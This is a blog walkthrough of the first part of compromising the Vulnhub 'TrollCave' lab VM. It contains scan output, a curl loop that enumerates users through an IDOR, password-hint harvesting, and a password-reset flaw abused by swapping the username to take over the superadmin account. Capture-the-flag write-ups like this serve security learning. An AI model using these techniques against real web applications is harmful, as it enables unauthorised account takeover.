TrollCave Boot to Root VM Walkthrough PART ONE

Introduction

Today we’ll begin the process of compromising one of Vulnhub’s latest VMs, “TrollCave”. The author, David Yates, says that this VM is attempting to be as realistic as possible, AKA straying from the usual contrived scenarios which pop up in some CTFs (port knocking, MP3 file waveform analysis etc.)

The author has also stressed that a kernel exploit isn’t required to root this box, so that’ll save some time when we come to privesc the box later.

This is the first VM which has tested me to the point where I’ve had to stop and take a break, as such this write up only covers from enumeration through to getting admin in the webapp – part 2 of the write up will detail how to shell the box and continue exploitation.

Let’s go and break stuff!

NMap

root@kali:~# nmap -sV -T5 -sC -p- 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-24 19:03 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:ab:d7:2e:58:74:aa:86:28:dd:98:77:2f:53:d9:73 (RSA)
|   256 57:5e:f4:77:b3:94:91:7e:9c:55:26:30:43:64:b1:72 (ECDSA)
|_  256 17:4d:7b:04:44:53:d1:51:d2:93:e9:50:e0:b2:20:4c (EdDSA)
80/tcp open  http    nginx 1.10.3 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Trollcave
MAC Address: 08:00:27:D0:D7:C5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.26 seconds

Nothing hugely exciting here, there’s an NGINX webserver and an SSH server. Let’s go and poke the webserver (whilst running the usual tools against it.)

Nikto

root@kali:~# nikto -host http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2018-03-24 19:07:59 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ Cookie _thirtytwo_session created without the httponly flag
+ Uncommon header 'x-request-id' found, with contents: a9517fcb-1624-434f-983b-5099d46446e4
+ Uncommon header 'x-runtime' found, with contents: 0.029192
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ /login.asp: Admin login page/section found.
+ /login.html: Admin login page/section found.
+ /login.php: Admin login page/section found.
+ 7537 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2018-03-24 19:09:36 (GMT0) (97 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A few interesting things pop out here.Β /login/Β is obviously of interest to us, as is login.php. I have no idea why there’s a login.php3 and a login.asp there.. that requires some investigating.

Dirb

root@kali:~# dirb http://192.168.56.101/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Mar 24 19:08:01 2018
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/404 (CODE:200|SIZE:1564)                                                                                                                                                                  
+ http://192.168.56.101/500 (CODE:200|SIZE:1477)                                                                                                                                                                  
+ http://192.168.56.101/admin (CODE:302|SIZE:93)                                                                                                                                                                  
+ http://192.168.56.101/admin.cgi (CODE:302|SIZE:93)                                                                                                                                                              
+ http://192.168.56.101/admin.php (CODE:302|SIZE:93)                                                                                                                                                              
+ http://192.168.56.101/admin.pl (CODE:302|SIZE:93)                                                                                                                                                               
+ http://192.168.56.101/comments (CODE:302|SIZE:93)                                                                                                                                                               
+ http://192.168.56.101/favicon.ico (CODE:200|SIZE:0)                                                                                                                                                             
+ http://192.168.56.101/inbox (CODE:302|SIZE:93)                                                                                                                                                                  
+ http://192.168.56.101/login (CODE:200|SIZE:2208)                                                                                                                                                                
+ http://192.168.56.101/register (CODE:302|SIZE:88)                                                                                                                                                               
+ http://192.168.56.101/reports (CODE:302|SIZE:93)                                                                                                                                                                
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:202)                                                                                                                                                            
+ http://192.168.56.101/users (CODE:302|SIZE:93)                                                                                                                                                                  
                                                                                                                                                                                                                  
-----------------
END_TIME: Sat Mar 24 19:08:35 2018
DOWNLOADED: 4612 - FOUND: 14

Dirb foundΒ allΒ the treats! There’s that weird pattern again, admin.cgi, admin.php, admin.pl… No admin.asp this time though (for some reason.) let’s fire up the app in our browser and go to town on it.

Manual enumeration

So at first glance it’s a nicely designed, well locked down blog.

All of the interesting findings from above are locked down with access control saying that you must be logged in. No obvious LFI vectors in the URLs, but there is is an IDOR problem that we can use to enumerate every user in the app.

When navigating to a user’s profile page the URL changes from user/1 to user/2 etc. so we can write a little script to enumerate all users –

root@kali:~# for f in `seq 1 20`; do curl --silent http://192.168.56.101/users/$f | grep -i recipient_name | cut -d= -f3 | cut -d\" -f1 ; done
King
dave
dragon
coderguy
cooldude89
Sir
Q
teflon
TheDankMan
artemus
MrPotatoHead
Ian
kev
notanother
anybodyhome
onlyme
xer

Yeah the script’s a little ugly but hey, I’m a programmer and sometimes it’s fun to be a bit sloppy! πŸ˜‰

So we’ve got a list of all users now. We notice that when we try and log in we get given a little password hint by the app.. Let’s use this lovely data to get all of the password hints using Burpsuite –

I used the awesome Intruder module in burpsuite to query for every user, then used the results processing options to pull out just the hints from the results!

King πŸ™‚
dave nah lol
dragon Over fire and over stone…
coderguy πŸ™‚
cooldude89 i am the dankest
Sir It’s super secure
Q Your normal password
teflon swordfish
TheDankMan 420
artemus garden
MrPotatoHead you know…
Ian a
kev mother’s maiden name
notanother (:
anybodyhome no one is
onlyme It is what it is
xer fave pronoun

And we’re done! So now we can start trying to guess some passwords using these cryptic hints..

And get nowhere. Blargh.

Password Reset Pwnage

So after looking over all of the blog posts a bit closer, I spot one which mentions a half-implemented password reset function written in Ruby! So after Googling how to do password resets in Ruby on Rails I came across this absolute belter, which lead me to trying various password_reset URLs until I came across this gem (see what I did there..!)

Uh oh… That doesn’t look good does it! πŸ˜‰

Let’s reset King, the SuperAdmin’s password.

Bah! It’ll still let us progress further anyway, let’s pick a member and reset their password.

Ugh! More roadblocks! Although look at that URL.. What would happen if we swapped ‘xer’ for ‘King’..?

So far so good, it’s given us a proper password reset form. Let’s add a password and see if it works.

BINGO! We’re King the Superadmin! How awesome is that?

Conclusion

I’ve decided to park this VM for now, until my skills improve a little more and I’m able to fully compromise this box. Part 2 will be written and posted within the next few months, all being well.

Huge thanks to this box’s creator (link in Introduction) this is a really unique challenge which I’ve thoroughly enjoyed so far.

 

5 Comments

Add a Comment

Your email address will not be published. Required fields are marked *

I accept that my given data and my IP address is sent to a server in the USA only for the purpose of spam prevention through the Akismet program.More information on Akismet and GDPR.